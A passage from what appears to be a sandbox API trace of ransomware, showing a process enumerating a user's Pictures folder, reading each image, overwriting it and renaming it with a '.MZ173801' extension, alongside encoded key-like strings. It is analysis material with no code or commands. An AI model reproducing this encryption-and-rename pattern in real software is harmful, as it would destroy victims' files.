ftLastWriteTime.dwLowDateTime=0xa5343632, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x558d, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Ch3abfsCtWfA_.jpg.MZ173801", cAlternateFileName="CH3ABF~1.MZ1")) returned 1 [0114.990] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.990] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.990] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0114.990] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c156bf0, ftCreationTime.dwHighDateTime=0x1d5e706, ftLastAccessTime.dwLowDateTime=0xc9e106d0, ftLastAccessTime.dwHighDateTime=0x1d5e24b, ftLastWriteTime.dwLowDateTime=0xa55a5c16, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1726f, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="EIGtc7lwmfk.png.MZ173801", cAlternateFileName="EIGTC7~1.MZ1")) returned 1 [0114.990] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.990] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.990] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96957a40, ftCreationTime.dwHighDateTime=0x1d5ef48, ftLastAccessTime.dwLowDateTime=0xc825050, ftLastAccessTime.dwHighDateTime=0x1d5e7a3, ftLastWriteTime.dwLowDateTime=0xc825050, ftLastWriteTime.dwHighDateTime=0x1d5e7a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="F yK2LwO", cAlternateFileName="FYK2LW~1")) returned 1 [0114.990] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.990] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.991] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96957a40, ftCreationTime.dwHighDateTime=0x1d5ef48, ftLastAccessTime.dwLowDateTime=0xc825050, ftLastAccessTime.dwHighDateTime=0x1d5e7a3, ftLastWriteTime.dwLowDateTime=0xc825050, ftLastWriteTime.dwHighDateTime=0x1d5e7a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1be00 [0114.991] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96957a40, ftCreationTime.dwHighDateTime=0x1d5ef48, ftLastAccessTime.dwLowDateTime=0xc825050, ftLastAccessTime.dwHighDateTime=0x1d5e7a3, ftLastWriteTime.dwLowDateTime=0xc825050, ftLastWriteTime.dwHighDateTime=0x1d5e7a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0114.991] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef488e30, ftCreationTime.dwHighDateTime=0x1d5ed94, ftLastAccessTime.dwLowDateTime=0xcc9dfd00, ftLastAccessTime.dwHighDateTime=0x1d5e445, ftLastWriteTime.dwLowDateTime=0xcc9dfd00, ftLastWriteTime.dwHighDateTime=0x1d5e445, nFileSizeHigh=0x0, nFileSizeLow=0x1687d, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="2ffpB.gif", cAlternateFileName="")) returned 1 [0114.991] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0114.991] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0114.991] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\2ffpB.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\2ffpb.gif"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef488e30, ftCreationTime.dwHighDateTime=0x1d5ed94, ftLastAccessTime.dwLowDateTime=0xcc9dfd00, ftLastAccessTime.dwHighDateTime=0x1d5e445, ftLastWriteTime.dwLowDateTime=0xcc9dfd00, ftLastWriteTime.dwHighDateTime=0x1d5e445, nFileSizeHigh=0x0, nFileSizeLow=0x1687d)) returned 1 [0114.991] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.991] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0114.992] GetCurrentThreadId () returned 0x1358 [0114.992] GetCurrentThreadId () returned 0x1358 [0114.992] GetCurrentThreadId () returned 0x1358 [0114.992] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.992] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0114.992] GetCurrentThreadId () returned 0x1358 [0114.992] GetCurrentThreadId () returned 0x1358 [0114.993] GetCurrentThreadId () returned 0x1358 [0114.993] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\2ffpB.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\2ffpb.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0114.993] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0114.993] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0114.993] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x1687d [0114.993] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0114.993] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1687d, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x1687d, lpOverlapped=0x0) returned 1 [0114.994] CloseHandle (hObject=0x3d0) returned 1 [0114.996] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\2ffpB.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\2ffpb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0114.997] WriteFile (in: hFile=0x3d0, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x1687d, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f6f0*=0x1687d, lpOverlapped=0x0) returned 1 [0115.000] CloseHandle (hObject=0x3d0) returned 1 [0115.003] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\2ffpB.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\2ffpb.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\2ffpB.gif.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\2ffpb.gif.mz173801")) returned 1 [0115.003] GetCurrentThreadId () returned 0x1358 [0115.003] GetCurrentThreadId () returned 0x1358 [0115.003] GetCurrentThreadId () returned 0x1358 [0115.003] GetCurrentThreadId () returned 0x1358 [0115.003] GetCurrentThreadId () returned 0x1358 [0115.003] GetCurrentThreadId () returned 0x1358 [0115.003] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32adfff0, ftCreationTime.dwHighDateTime=0x1d5e423, ftLastAccessTime.dwLowDateTime=0x5c232130, ftLastAccessTime.dwHighDateTime=0x1d5e4b4, ftLastWriteTime.dwLowDateTime=0x5c232130, ftLastWriteTime.dwHighDateTime=0x1d5e4b4, nFileSizeHigh=0x0, nFileSizeLow=0x123a5, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="3JY_fq-iYjeZZ.bmp", cAlternateFileName="3JY_FQ~1.BMP")) returned 1 [0115.003] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0115.004] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0115.004] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\3JY_fq-iYjeZZ.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\3jy_fq-iyjezz.bmp"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32adfff0, ftCreationTime.dwHighDateTime=0x1d5e423, ftLastAccessTime.dwLowDateTime=0x5c232130, ftLastAccessTime.dwHighDateTime=0x1d5e4b4, ftLastWriteTime.dwLowDateTime=0x5c232130, ftLastWriteTime.dwHighDateTime=0x1d5e4b4, nFileSizeHigh=0x0, nFileSizeLow=0x123a5)) returned 1 [0115.004] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.004] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0115.004] GetCurrentThreadId () returned 0x1358 [0115.004] GetCurrentThreadId () returned 0x1358 [0115.004] GetCurrentThreadId () returned 0x1358 [0115.005] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 